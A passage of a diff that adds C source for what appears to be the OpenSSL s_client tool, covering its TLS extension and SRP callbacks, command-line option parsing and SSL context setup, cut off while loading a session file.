+               " -alpn arg         - enable ALPN extension, considering named protocols supported (comma-separated list)\n");
+    BIO_printf(bio_err,
+               " -legacy_renegotiation - enable use of legacy renegotiation (dangerous)\n");
+#ifndef OPENSSL_NO_SRTP
+    BIO_printf(bio_err,
+               " -use_srtp profiles - Offer SRTP key management with a colon-separated profile list\n");
+#endif
+    BIO_printf(bio_err,
+               " -keymatexport label   - Export keying material using label\n");
+    BIO_printf(bio_err,
+               " -keymatexportlen len  - Export len bytes of keying material (default 20)\n");
+}
+
+#ifndef OPENSSL_NO_TLSEXT
+
+/* This is a context that we pass to callbacks */
+typedef struct tlsextctx_st {
+    BIO *biodebug;
+    int ack;
+} tlsextctx;
+
+static int MS_CALLBACK ssl_servername_cb(SSL *s, int *ad, void *arg)
+{
+    tlsextctx *p = (tlsextctx *) arg;
+    const char *hn = SSL_get_servername(s, TLSEXT_NAMETYPE_host_name);
+    if (SSL_get_servername_type(s) != -1)
+        p->ack = !SSL_session_reused(s) && hn != NULL;
+    else
+        BIO_printf(bio_err, "Can't use SSL_get_servername\n");
+
+    return SSL_TLSEXT_ERR_OK;
+}
+
+# ifndef OPENSSL_NO_SRP
+
+/* This is a context that we pass to all callbacks */
+typedef struct srp_arg_st {
+    char *srppassin;
+    char *srplogin;
+    int msg;                    /* copy from c_msg */
+    int debug;                  /* copy from c_debug */
+    int amp;                    /* allow more groups */
+    int strength /* minimal size for N */ ;
+} SRP_ARG;
+
+#  define SRP_NUMBER_ITERATIONS_FOR_PRIME 64
+
+static int srp_Verify_N_and_g(BIGNUM *N, BIGNUM *g)
+{
+    BN_CTX *bn_ctx = BN_CTX_new();
+    BIGNUM *p = BN_new();
+    BIGNUM *r = BN_new();
+    int ret =
+        g != NULL && N != NULL && bn_ctx != NULL && BN_is_odd(N) &&
+        BN_is_prime_ex(N, SRP_NUMBER_ITERATIONS_FOR_PRIME, bn_ctx, NULL) &&
+        p != NULL && BN_rshift1(p, N) &&
+        /* p = (N-1)/2 */
+        BN_is_prime_ex(p, SRP_NUMBER_ITERATIONS_FOR_PRIME, bn_ctx, NULL) &&
+        r != NULL &&
+        /* verify g^((N-1)/2) == -1 (mod N) */
+        BN_mod_exp(r, g, p, N, bn_ctx) &&
+        BN_add_word(r, 1) && BN_cmp(r, N) == 0;
+
+    if (r)
+        BN_free(r);
+    if (p)
+        BN_free(p);
+    if (bn_ctx)
+        BN_CTX_free(bn_ctx);
+    return ret;
+}
+
+/*-
+ * This callback is used here for two purposes:
+ * - extended debugging
+ * - making some primality tests for unknown groups
+ * The callback is only called for a non default group.
+ *
+ * An application does not need the call back at all if
+ * only the stanard groups are used.  In real life situations,
+ * client and server already share well known groups,
+ * thus there is no need to verify them.
+ * Furthermore, in case that a server actually proposes a group that
+ * is not one of those defined in RFC 5054, it is more appropriate
+ * to add the group to a static list and then compare since
+ * primality tests are rather cpu consuming.
+ */
+
+static int MS_CALLBACK ssl_srp_verify_param_cb(SSL *s, void *arg)
+{
+    SRP_ARG *srp_arg = (SRP_ARG *)arg;
+    BIGNUM *N = NULL, *g = NULL;
+    if (!(N = SSL_get_srp_N(s)) || !(g = SSL_get_srp_g(s)))
+        return 0;
+    if (srp_arg->debug || srp_arg->msg || srp_arg->amp == 1) {
+        BIO_printf(bio_err, "SRP parameters:\n");
+        BIO_printf(bio_err, "\tN=");
+        BN_print(bio_err, N);
+        BIO_printf(bio_err, "\n\tg=");
+        BN_print(bio_err, g);
+        BIO_printf(bio_err, "\n");
+    }
+
+    if (SRP_check_known_gN_param(g, N))
+        return 1;
+
+    if (srp_arg->amp == 1) {
+        if (srp_arg->debug)
+            BIO_printf(bio_err,
+                       "SRP param N and g are not known params, going to check deeper.\n");
+
+        /*
+         * The srp_moregroups is a real debugging feature. Implementors
+         * should rather add the value to the known ones. The minimal size
+         * has already been tested.
+         */
+        if (BN_num_bits(g) <= BN_BITS && srp_Verify_N_and_g(N, g))
+            return 1;
+    }
+    BIO_printf(bio_err, "SRP param N and g rejected.\n");
+    return 0;
+}
+
+#  define PWD_STRLEN 1024
+
+static char *MS_CALLBACK ssl_give_srp_client_pwd_cb(SSL *s, void *arg)
+{
+    SRP_ARG *srp_arg = (SRP_ARG *)arg;
+    char *pass = (char *)OPENSSL_malloc(PWD_STRLEN + 1);
+    PW_CB_DATA cb_tmp;
+    int l;
+
+    cb_tmp.password = (char *)srp_arg->srppassin;
+    cb_tmp.prompt_info = "SRP user";
+    if ((l = password_callback(pass, PWD_STRLEN, 0, &cb_tmp)) < 0) {
+        BIO_printf(bio_err, "Can't read Password\n");
+        OPENSSL_free(pass);
+        return NULL;
+    }
+    *(pass + l) = '\0';
+
+    return pass;
+}
+
+# endif
+# ifndef OPENSSL_NO_SRTP
+char *srtp_profiles = NULL;
+# endif
+
+# ifndef OPENSSL_NO_NEXTPROTONEG
+/* This the context that we pass to next_proto_cb */
+typedef struct tlsextnextprotoctx_st {
+    unsigned char *data;
+    unsigned short len;
+    int status;
+} tlsextnextprotoctx;
+
+static tlsextnextprotoctx next_proto;
+
+static int next_proto_cb(SSL *s, unsigned char **out, unsigned char *outlen,
+                         const unsigned char *in, unsigned int inlen,
+                         void *arg)
+{
+    tlsextnextprotoctx *ctx = arg;
+
+    if (!c_quiet) {
+        /* We can assume that |in| is syntactically valid. */
+        unsigned i;
+        BIO_printf(bio_c_out, "Protocols advertised by server: ");
+        for (i = 0; i < inlen;) {
+            if (i)
+                BIO_write(bio_c_out, ", ", 2);
+            BIO_write(bio_c_out, &in[i + 1], in[i]);
+            i += in[i] + 1;
+        }
+        BIO_write(bio_c_out, "\n", 1);
+    }
+
+    ctx->status =
+        SSL_select_next_proto(out, outlen, in, inlen, ctx->data, ctx->len);
+    return SSL_TLSEXT_ERR_OK;
+}
+# endif                         /* ndef OPENSSL_NO_NEXTPROTONEG */
+
+static int serverinfo_cli_parse_cb(SSL *s, unsigned int ext_type,
+                                   const unsigned char *in, size_t inlen,
+                                   int *al, void *arg)
+{
+    char pem_name[100];
+    unsigned char ext_buf[4 + 65536];
+
+    /* Reconstruct the type/len fields prior to extension data */
+    ext_buf[0] = ext_type >> 8;
+    ext_buf[1] = ext_type & 0xFF;
+    ext_buf[2] = inlen >> 8;
+    ext_buf[3] = inlen & 0xFF;
+    memcpy(ext_buf + 4, in, inlen);
+
+    BIO_snprintf(pem_name, sizeof(pem_name), "SERVERINFO FOR EXTENSION %d",
+                 ext_type);
+    PEM_write_bio(bio_c_out, pem_name, "", ext_buf, 4 + inlen);
+    return 1;
+}
+
+#endif
+
+enum {
+    PROTO_OFF = 0,
+    PROTO_SMTP,
+    PROTO_POP3,
+    PROTO_IMAP,
+    PROTO_FTP,
+    PROTO_XMPP
+};
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    int build_chain = 0;
+    SSL *con = NULL;
+#ifndef OPENSSL_NO_KRB5
+    KSSL_CTX *kctx;
+#endif
+    int s, k, width, state = 0;
+    char *cbuf = NULL, *sbuf = NULL, *mbuf = NULL;
+    int cbuf_len, cbuf_off;
+    int sbuf_len, sbuf_off;
+    fd_set readfds, writefds;
+    short port = PORT;
+    int full_log = 1;
+    char *host = SSL_HOST_NAME;
+    char *cert_file = NULL, *key_file = NULL, *chain_file = NULL;
+    int cert_format = FORMAT_PEM, key_format = FORMAT_PEM;
+    char *passarg = NULL, *pass = NULL;
+    X509 *cert = NULL;
+    EVP_PKEY *key = NULL;
+    STACK_OF(X509) *chain = NULL;
+    char *CApath = NULL, *CAfile = NULL;
+    char *chCApath = NULL, *chCAfile = NULL;
+    char *vfyCApath = NULL, *vfyCAfile = NULL;
+    int reconnect = 0, badop = 0, verify = SSL_VERIFY_NONE;
+    int crlf = 0;
+    int write_tty, read_tty, write_ssl, read_ssl, tty_on, ssl_pending;
+    SSL_CTX *ctx = NULL;
+    int ret = 1, in_init = 1, i, nbio_test = 0;
+    int starttls_proto = PROTO_OFF;
+    int prexit = 0;
+    X509_VERIFY_PARAM *vpm = NULL;
+    int badarg = 0;
+    const SSL_METHOD *meth = NULL;
+    int socket_type = SOCK_STREAM;
+    BIO *sbio;
+    char *inrand = NULL;
+    int mbuf_len = 0;
+    struct timeval timeout, *timeoutp;
+#ifndef OPENSSL_NO_ENGINE
+    char *engine_id = NULL;
+    char *ssl_client_engine_id = NULL;
+    ENGINE *ssl_client_engine = NULL;
+#endif
+    ENGINE *e = NULL;
+#if defined(OPENSSL_SYS_WINDOWS) || defined(OPENSSL_SYS_MSDOS) || defined(OPENSSL_SYS_NETWARE) || defined(OPENSSL_SYS_BEOS_R5)
+    struct timeval tv;
+# if defined(OPENSSL_SYS_BEOS_R5)
+    int stdin_set = 0;
+# endif
+#endif
+#ifndef OPENSSL_NO_TLSEXT
+    char *servername = NULL;
+    tlsextctx tlsextcbp = { NULL, 0 };
+# ifndef OPENSSL_NO_NEXTPROTONEG
+    const char *next_proto_neg_in = NULL;
+# endif
+    const char *alpn_in = NULL;
+# define MAX_SI_TYPES 100
+    unsigned short serverinfo_types[MAX_SI_TYPES];
+    int serverinfo_types_count = 0;
+#endif
+    char *sess_in = NULL;
+    char *sess_out = NULL;
+    struct sockaddr peer;
+    int peerlen = sizeof(peer);
+    int fallback_scsv = 0;
+    int enable_timeouts = 0;
+    long socket_mtu = 0;
+#ifndef OPENSSL_NO_JPAKE
+    static char *jpake_secret = NULL;
+# define no_jpake !jpake_secret
+#else
+# define no_jpake 1
+#endif
+#ifndef OPENSSL_NO_SRP
+    char *srppass = NULL;
+    int srp_lateuser = 0;
+    SRP_ARG srp_arg = { NULL, NULL, 0, 0, 0, 1024 };
+#endif
+    SSL_EXCERT *exc = NULL;
+
+    SSL_CONF_CTX *cctx = NULL;
+    STACK_OF(OPENSSL_STRING) *ssl_args = NULL;
+
+    char *crl_file = NULL;
+    int crl_format = FORMAT_PEM;
+    int crl_download = 0;
+    STACK_OF(X509_CRL) *crls = NULL;
+
+    meth = SSLv23_client_method();
+
+    apps_startup();
+    c_Pause = 0;
+    c_quiet = 0;
+    c_ign_eof = 0;
+    c_debug = 0;
+    c_msg = 0;
+    c_showcerts = 0;
+
+    if (bio_err == NULL)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    cctx = SSL_CONF_CTX_new();
+    if (!cctx)
+        goto end;
+    SSL_CONF_CTX_set_flags(cctx, SSL_CONF_FLAG_CLIENT);
+    SSL_CONF_CTX_set_flags(cctx, SSL_CONF_FLAG_CMDLINE);
+
+    if (((cbuf = OPENSSL_malloc(BUFSIZZ)) == NULL) ||
+        ((sbuf = OPENSSL_malloc(BUFSIZZ)) == NULL) ||
+        ((mbuf = OPENSSL_malloc(BUFSIZZ)) == NULL)) {
+        BIO_printf(bio_err, "out of memory\n");
+        goto end;
+    }
+
+    verify_depth = 0;
+    verify_error = X509_V_OK;
+#ifdef FIONBIO
+    c_nbio = 0;
+#endif
+
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-host") == 0) {
+            if (--argc < 1)
+                goto bad;
+            host = *(++argv);
+        } else if (strcmp(*argv, "-port") == 0) {
+            if (--argc < 1)
+                goto bad;
+            port = atoi(*(++argv));
+            if (port == 0)
+                goto bad;
+        } else if (strcmp(*argv, "-connect") == 0) {
+            if (--argc < 1)
+                goto bad;
+            if (!extract_host_port(*(++argv), &host, NULL, &port))
+                goto bad;
+        } else if (strcmp(*argv, "-verify") == 0) {
+            verify = SSL_VERIFY_PEER;
+            if (--argc < 1)
+                goto bad;
+            verify_depth = atoi(*(++argv));
+            if (!c_quiet)
+                BIO_printf(bio_err, "verify depth is %d\n", verify_depth);
+        } else if (strcmp(*argv, "-cert") == 0) {
+            if (--argc < 1)
+                goto bad;
+            cert_file = *(++argv);
+        } else if (strcmp(*argv, "-CRL") == 0) {
+            if (--argc < 1)
+                goto bad;
+            crl_file = *(++argv);
+        } else if (strcmp(*argv, "-crl_download") == 0)
+            crl_download = 1;
+        else if (strcmp(*argv, "-sess_out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            sess_out = *(++argv);
+        } else if (strcmp(*argv, "-sess_in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            sess_in = *(++argv);
+        } else if (strcmp(*argv, "-certform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            cert_format = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-CRLform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            crl_format = str2fmt(*(++argv));
+        } else if (args_verify(&argv, &argc, &badarg, bio_err, &vpm)) {
+            if (badarg)
+                goto bad;
+            continue;
+        } else if (strcmp(*argv, "-verify_return_error") == 0)
+            verify_return_error = 1;
+        else if (strcmp(*argv, "-verify_quiet") == 0)
+            verify_quiet = 1;
+        else if (strcmp(*argv, "-brief") == 0) {
+            c_brief = 1;
+            verify_quiet = 1;
+            c_quiet = 1;
+        } else if (args_excert(&argv, &argc, &badarg, bio_err, &exc)) {
+            if (badarg)
+                goto bad;
+            continue;
+        } else if (args_ssl(&argv, &argc, cctx, &badarg, bio_err, &ssl_args)) {
+            if (badarg)
+                goto bad;
+            continue;
+        } else if (strcmp(*argv, "-prexit") == 0)
+            prexit = 1;
+        else if (strcmp(*argv, "-crlf") == 0)
+            crlf = 1;
+        else if (strcmp(*argv, "-quiet") == 0) {
+            c_quiet = 1;
+            c_ign_eof = 1;
+        } else if (strcmp(*argv, "-ign_eof") == 0)
+            c_ign_eof = 1;
+        else if (strcmp(*argv, "-no_ign_eof") == 0)
+            c_ign_eof = 0;
+        else if (strcmp(*argv, "-pause") == 0)
+            c_Pause = 1;
+        else if (strcmp(*argv, "-debug") == 0)
+            c_debug = 1;
+#ifndef OPENSSL_NO_TLSEXT
+        else if (strcmp(*argv, "-tlsextdebug") == 0)
+            c_tlsextdebug = 1;
+        else if (strcmp(*argv, "-status") == 0)
+            c_status_req = 1;
+#endif
+#ifdef WATT32
+        else if (strcmp(*argv, "-wdebug") == 0)
+            dbug_init();
+#endif
+        else if (strcmp(*argv, "-msg") == 0)
+            c_msg = 1;
+        else if (strcmp(*argv, "-msgfile") == 0) {
+            if (--argc < 1)
+                goto bad;
+            bio_c_msg = BIO_new_file(*(++argv), "w");
+        }
+#ifndef OPENSSL_NO_SSL_TRACE
+        else if (strcmp(*argv, "-trace") == 0)
+            c_msg = 2;
+#endif
+        else if (strcmp(*argv, "-showcerts") == 0)
+            c_showcerts = 1;
+        else if (strcmp(*argv, "-nbio_test") == 0)
+            nbio_test = 1;
+        else if (strcmp(*argv, "-state") == 0)
+            state = 1;
+#ifndef OPENSSL_NO_PSK
+        else if (strcmp(*argv, "-psk_identity") == 0) {
+            if (--argc < 1)
+                goto bad;
+            psk_identity = *(++argv);
+        } else if (strcmp(*argv, "-psk") == 0) {
+            size_t j;
+
+            if (--argc < 1)
+                goto bad;
+            psk_key = *(++argv);
+            for (j = 0; j < strlen(psk_key); j++) {
+                if (isxdigit((unsigned char)psk_key[j]))
+                    continue;
+                BIO_printf(bio_err, "Not a hex number '%s'\n", *argv);
+                goto bad;
+            }
+        }
+#endif
+#ifndef OPENSSL_NO_SRP
+        else if (strcmp(*argv, "-srpuser") == 0) {
+            if (--argc < 1)
+                goto bad;
+            srp_arg.srplogin = *(++argv);
+            meth = TLSv1_client_method();
+        } else if (strcmp(*argv, "-srppass") == 0) {
+            if (--argc < 1)
+                goto bad;
+            srppass = *(++argv);
+            meth = TLSv1_client_method();
+        } else if (strcmp(*argv, "-srp_strength") == 0) {
+            if (--argc < 1)
+                goto bad;
+            srp_arg.strength = atoi(*(++argv));
+            BIO_printf(bio_err, "SRP minimal length for N is %d\n",
+                       srp_arg.strength);
+            meth = TLSv1_client_method();
+        } else if (strcmp(*argv, "-srp_lateuser") == 0) {
+            srp_lateuser = 1;
+            meth = TLSv1_client_method();
+        } else if (strcmp(*argv, "-srp_moregroups") == 0) {
+            srp_arg.amp = 1;
+            meth = TLSv1_client_method();
+        }
+#endif
+#ifndef OPENSSL_NO_SSL2
+        else if (strcmp(*argv, "-ssl2") == 0)
+            meth = SSLv2_client_method();
+#endif
+#ifndef OPENSSL_NO_SSL3_METHOD
+        else if (strcmp(*argv, "-ssl3") == 0)
+            meth = SSLv3_client_method();
+#endif
+#ifndef OPENSSL_NO_TLS1
+        else if (strcmp(*argv, "-tls1_2") == 0)
+            meth = TLSv1_2_client_method();
+        else if (strcmp(*argv, "-tls1_1") == 0)
+            meth = TLSv1_1_client_method();
+        else if (strcmp(*argv, "-tls1") == 0)
+            meth = TLSv1_client_method();
+#endif
+#ifndef OPENSSL_NO_DTLS1
+        else if (strcmp(*argv, "-dtls") == 0) {
+            meth = DTLS_client_method();
+            socket_type = SOCK_DGRAM;
+        } else if (strcmp(*argv, "-dtls1") == 0) {
+            meth = DTLSv1_client_method();
+            socket_type = SOCK_DGRAM;
+        } else if (strcmp(*argv, "-dtls1_2") == 0) {
+            meth = DTLSv1_2_client_method();
+            socket_type = SOCK_DGRAM;
+        } else if (strcmp(*argv, "-timeout") == 0)
+            enable_timeouts = 1;
+        else if (strcmp(*argv, "-mtu") == 0) {
+            if (--argc < 1)
+                goto bad;
+            socket_mtu = atol(*(++argv));
+        }
+#endif
+        else if (strcmp(*argv, "-fallback_scsv") == 0) {
+            fallback_scsv = 1;
+        } else if (strcmp(*argv, "-keyform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            key_format = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-pass") == 0) {
+            if (--argc < 1)
+                goto bad;
+            passarg = *(++argv);
+        } else if (strcmp(*argv, "-cert_chain") == 0) {
+            if (--argc < 1)
+                goto bad;
+            chain_file = *(++argv);
+        } else if (strcmp(*argv, "-key") == 0) {
+            if (--argc < 1)
+                goto bad;
+            key_file = *(++argv);
+        } else if (strcmp(*argv, "-reconnect") == 0) {
+            reconnect = 5;
+        } else if (strcmp(*argv, "-CApath") == 0) {
+            if (--argc < 1)
+                goto bad;
+            CApath = *(++argv);
+        } else if (strcmp(*argv, "-chainCApath") == 0) {
+            if (--argc < 1)
+                goto bad;
+            chCApath = *(++argv);
+        } else if (strcmp(*argv, "-verifyCApath") == 0) {
+            if (--argc < 1)
+                goto bad;
+            vfyCApath = *(++argv);
+        } else if (strcmp(*argv, "-build_chain") == 0)
+            build_chain = 1;
+        else if (strcmp(*argv, "-CAfile") == 0) {
+            if (--argc < 1)
+                goto bad;
+            CAfile = *(++argv);
+        } else if (strcmp(*argv, "-chainCAfile") == 0) {
+            if (--argc < 1)
+                goto bad;
+            chCAfile = *(++argv);
+        } else if (strcmp(*argv, "-verifyCAfile") == 0) {
+            if (--argc < 1)
+                goto bad;
+            vfyCAfile = *(++argv);
+        }
+#ifndef OPENSSL_NO_TLSEXT
+# ifndef OPENSSL_NO_NEXTPROTONEG
+        else if (strcmp(*argv, "-nextprotoneg") == 0) {
+            if (--argc < 1)
+                goto bad;
+            next_proto_neg_in = *(++argv);
+        }
+# endif
+        else if (strcmp(*argv, "-alpn") == 0) {
+            if (--argc < 1)
+                goto bad;
+            alpn_in = *(++argv);
+        } else if (strcmp(*argv, "-serverinfo") == 0) {
+            char *c;
+            int start = 0;
+            int len;
+
+            if (--argc < 1)
+                goto bad;
+            c = *(++argv);
+            serverinfo_types_count = 0;
+            len = strlen(c);
+            for (i = 0; i <= len; ++i) {
+                if (i == len || c[i] == ',') {
+                    serverinfo_types[serverinfo_types_count]
+                        = atoi(c + start);
+                    serverinfo_types_count++;
+                    start = i + 1;
+                }
+                if (serverinfo_types_count == MAX_SI_TYPES)
+                    break;
+            }
+        }
+#endif
+#ifdef FIONBIO
+        else if (strcmp(*argv, "-nbio") == 0) {
+            c_nbio = 1;
+        }
+#endif
+        else if (strcmp(*argv, "-starttls") == 0) {
+            if (--argc < 1)
+                goto bad;
+            ++argv;
+            if (strcmp(*argv, "smtp") == 0)
+                starttls_proto = PROTO_SMTP;
+            else if (strcmp(*argv, "pop3") == 0)
+                starttls_proto = PROTO_POP3;
+            else if (strcmp(*argv, "imap") == 0)
+                starttls_proto = PROTO_IMAP;
+            else if (strcmp(*argv, "ftp") == 0)
+                starttls_proto = PROTO_FTP;
+            else if (strcmp(*argv, "xmpp") == 0)
+                starttls_proto = PROTO_XMPP;
+            else
+                goto bad;
+        }
+#ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine_id = *(++argv);
+        } else if (strcmp(*argv, "-ssl_client_engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            ssl_client_engine_id = *(++argv);
+        }
+#endif
+        else if (strcmp(*argv, "-rand") == 0) {
+            if (--argc < 1)
+                goto bad;
+            inrand = *(++argv);
+        }
+#ifndef OPENSSL_NO_TLSEXT
+        else if (strcmp(*argv, "-servername") == 0) {
+            if (--argc < 1)
+                goto bad;
+            servername = *(++argv);
+            /* meth=TLSv1_client_method(); */
+        }
+#endif
+#ifndef OPENSSL_NO_JPAKE
+        else if (strcmp(*argv, "-jpake") == 0) {
+            if (--argc < 1)
+                goto bad;
+            jpake_secret = *++argv;
+        }
+#endif
+#ifndef OPENSSL_NO_SRTP
+        else if (strcmp(*argv, "-use_srtp") == 0) {
+            if (--argc < 1)
+                goto bad;
+            srtp_profiles = *(++argv);
+        }
+#endif
+        else if (strcmp(*argv, "-keymatexport") == 0) {
+            if (--argc < 1)
+                goto bad;
+            keymatexportlabel = *(++argv);
+        } else if (strcmp(*argv, "-keymatexportlen") == 0) {
+            if (--argc < 1)
+                goto bad;
+            keymatexportlen = atoi(*(++argv));
+            if (keymatexportlen == 0)
+                goto bad;
+        } else {
+            BIO_printf(bio_err, "unknown option %s\n", *argv);
+            badop = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+    if (badop) {
+ bad:
+        sc_usage();
+        goto end;
+    }
+#if !defined(OPENSSL_NO_JPAKE) && !defined(OPENSSL_NO_PSK)
+    if (jpake_secret) {
+        if (psk_key) {
+            BIO_printf(bio_err, "Can't use JPAKE and PSK together\n");
+            goto end;
+        }
+        psk_identity = "JPAKE";
+    }
+#endif
+
+    OpenSSL_add_ssl_algorithms();
+    SSL_load_error_strings();
+
+#if !defined(OPENSSL_NO_TLSEXT) && !defined(OPENSSL_NO_NEXTPROTONEG)
+    next_proto.status = -1;
+    if (next_proto_neg_in) {
+        next_proto.data =
+            next_protos_parse(&next_proto.len, next_proto_neg_in);
+        if (next_proto.data == NULL) {
+            BIO_printf(bio_err, "Error parsing -nextprotoneg argument\n");
+            goto end;
+        }
+    } else
+        next_proto.data = NULL;
+#endif
+
+#ifndef OPENSSL_NO_ENGINE
+    e = setup_engine(bio_err, engine_id, 1);
+    if (ssl_client_engine_id) {
+        ssl_client_engine = ENGINE_by_id(ssl_client_engine_id);
+        if (!ssl_client_engine) {
+            BIO_printf(bio_err, "Error getting client auth engine\n");
+            goto end;
+        }
+    }
+#endif
+    if (!app_passwd(bio_err, passarg, NULL, &pass, NULL)) {
+        BIO_printf(bio_err, "Error getting password\n");
+        goto end;
+    }
+
+    if (key_file == NULL)
+        key_file = cert_file;
+
+    if (key_file) {
+
+        key = load_key(bio_err, key_file, key_format, 0, pass, e,
+                       "client certificate private key file");
+        if (!key) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+
+    }
+
+    if (cert_file) {
+        cert = load_cert(bio_err, cert_file, cert_format,
+                         NULL, e, "client certificate file");
+
+        if (!cert) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+
+    if (chain_file) {
+        chain = load_certs(bio_err, chain_file, FORMAT_PEM,
+                           NULL, e, "client certificate chain");
+        if (!chain)
+            goto end;
+    }
+
+    if (crl_file) {
+        X509_CRL *crl;
+        crl = load_crl(crl_file, crl_format);
+        if (!crl) {
+            BIO_puts(bio_err, "Error loading CRL\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        crls = sk_X509_CRL_new_null();
+        if (!crls || !sk_X509_CRL_push(crls, crl)) {
+            BIO_puts(bio_err, "Error adding CRL\n");
+            ERR_print_errors(bio_err);
+            X509_CRL_free(crl);
+            goto end;
+        }
+    }
+
+    if (!load_excert(&exc, bio_err))
+        goto end;
+
+    if (!app_RAND_load_file(NULL, bio_err, 1) && inrand == NULL
+        && !RAND_status()) {
+        BIO_printf(bio_err,
+                   "warning, not much extra random data, consider using the -rand option\n");
+    }
+    if (inrand != NULL)
+        BIO_printf(bio_err, "%ld semi-random bytes loaded\n",
+                   app_RAND_load_files(inrand));
+
+    if (bio_c_out == NULL) {
+        if (c_quiet && !c_debug) {
+            bio_c_out = BIO_new(BIO_s_null());
+            if (c_msg && !bio_c_msg)
+                bio_c_msg = BIO_new_fp(stdout, BIO_NOCLOSE);
+        } else {
+            if (bio_c_out == NULL)
+                bio_c_out = BIO_new_fp(stdout, BIO_NOCLOSE);
+        }
+    }
+#ifndef OPENSSL_NO_SRP
+    if (!app_passwd(bio_err, srppass, NULL, &srp_arg.srppassin, NULL)) {
+        BIO_printf(bio_err, "Error getting password\n");
+        goto end;
+    }
+#endif
+
+    ctx = SSL_CTX_new(meth);
+    if (ctx == NULL) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (vpm)
+        SSL_CTX_set1_param(ctx, vpm);
+
+    if (!args_ssl_call(ctx, bio_err, cctx, ssl_args, 1, no_jpake)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (!ssl_load_stores(ctx, vfyCApath, vfyCAfile, chCApath, chCAfile,
+                         crls, crl_download)) {
+        BIO_printf(bio_err, "Error loading store locations\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+#ifndef OPENSSL_NO_ENGINE
+    if (ssl_client_engine) {
+        if (!SSL_CTX_set_client_cert_engine(ctx, ssl_client_engine)) {
+            BIO_puts(bio_err, "Error setting client auth engine\n");
+            ERR_print_errors(bio_err);
+            ENGINE_free(ssl_client_engine);
+            goto end;
+        }
+        ENGINE_free(ssl_client_engine);
+    }
+#endif
+
+#ifndef OPENSSL_NO_PSK
+# ifdef OPENSSL_NO_JPAKE
+    if (psk_key != NULL)
+# else
+    if (psk_key != NULL || jpake_secret)
+# endif
+    {
+        if (c_debug)
+            BIO_printf(bio_c_out,
+                       "PSK key given or JPAKE in use, setting client callback\n");
+        SSL_CTX_set_psk_client_callback(ctx, psk_client_cb);
+    }
+#endif
+#ifndef OPENSSL_NO_SRTP
+    if (srtp_profiles != NULL)
+        SSL_CTX_set_tlsext_use_srtp(ctx, srtp_profiles);
+#endif
+    if (exc)
+        ssl_ctx_set_excert(ctx, exc);
+    /*
+     * DTLS: partial reads end up discarding unread UDP bytes :-( Setting
+     * read ahead solves this problem.
+     */
+    if (socket_type == SOCK_DGRAM)
+        SSL_CTX_set_read_ahead(ctx, 1);
+
+#if !defined(OPENSSL_NO_TLSEXT)
+# if !defined(OPENSSL_NO_NEXTPROTONEG)
+    if (next_proto.data)
+        SSL_CTX_set_next_proto_select_cb(ctx, next_proto_cb, &next_proto);
+# endif
+    if (alpn_in) {
+        unsigned short alpn_len;
+        unsigned char *alpn = next_protos_parse(&alpn_len, alpn_in);
+
+        if (alpn == NULL) {
+            BIO_printf(bio_err, "Error parsing -alpn argument\n");
+            goto end;
+        }
+        SSL_CTX_set_alpn_protos(ctx, alpn, alpn_len);
+        OPENSSL_free(alpn);
+    }
+#endif
+#ifndef OPENSSL_NO_TLSEXT
+    for (i = 0; i < serverinfo_types_count; i++) {
+        SSL_CTX_add_client_custom_ext(ctx,
+                                      serverinfo_types[i],
+                                      NULL, NULL, NULL,
+                                      serverinfo_cli_parse_cb, NULL);
+    }
+#endif
+
+    if (state)
+        SSL_CTX_set_info_callback(ctx, apps_ssl_info_callback);
+#if 0
+    else
+        SSL_CTX_set_cipher_list(ctx, getenv("SSL_CIPHER"));
+#endif
+
+    SSL_CTX_set_verify(ctx, verify, verify_callback);
+
+    if ((!SSL_CTX_load_verify_locations(ctx, CAfile, CApath)) ||
+        (!SSL_CTX_set_default_verify_paths(ctx))) {
+        /*
+         * BIO_printf(bio_err,"error setting default verify locations\n");
+         */
+        ERR_print_errors(bio_err);
+        /* goto end; */
+    }
+
+    ssl_ctx_add_crls(ctx, crls, crl_download);
+    if (!set_cert_key_stuff(ctx, cert, key, chain, build_chain))
+        goto end;
+
+#ifndef OPENSSL_NO_TLSEXT
+    if (servername != NULL) {
+        tlsextcbp.biodebug = bio_err;
+        SSL_CTX_set_tlsext_servername_callback(ctx, ssl_servername_cb);
+        SSL_CTX_set_tlsext_servername_arg(ctx, &tlsextcbp);
+    }
+# ifndef OPENSSL_NO_SRP
+    if (srp_arg.srplogin) {
+        if (!srp_lateuser && !SSL_CTX_set_srp_username(ctx, srp_arg.srplogin)) {
+            BIO_printf(bio_err, "Unable to set SRP username\n");
+            goto end;
+        }
+        srp_arg.msg = c_msg;
+        srp_arg.debug = c_debug;
+        SSL_CTX_set_srp_cb_arg(ctx, &srp_arg);
+        SSL_CTX_set_srp_client_pwd_callback(ctx, ssl_give_srp_client_pwd_cb);
+        SSL_CTX_set_srp_strength(ctx, srp_arg.strength);
+        if (c_msg || c_debug || srp_arg.amp == 0)
+            SSL_CTX_set_srp_verify_param_callback(ctx,
+                                                  ssl_srp_verify_param_cb);
+    }
+# endif
+#endif
+
+    con = SSL_new(ctx);
+    if (sess_in) {
+        SSL_SESSION *sess;
+        BIO *stmp = BIO_new_file(sess_in, "r");
+        if (!stmp) {
+            BIO_printf(bio_err, "Can't open session file %s\n", sess_in);
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        sess = PEM_read_bio_SSL_SESSION(stmp, NULL, 0, NULL);
+        BIO_free(stmp);
+        if (!sess) {
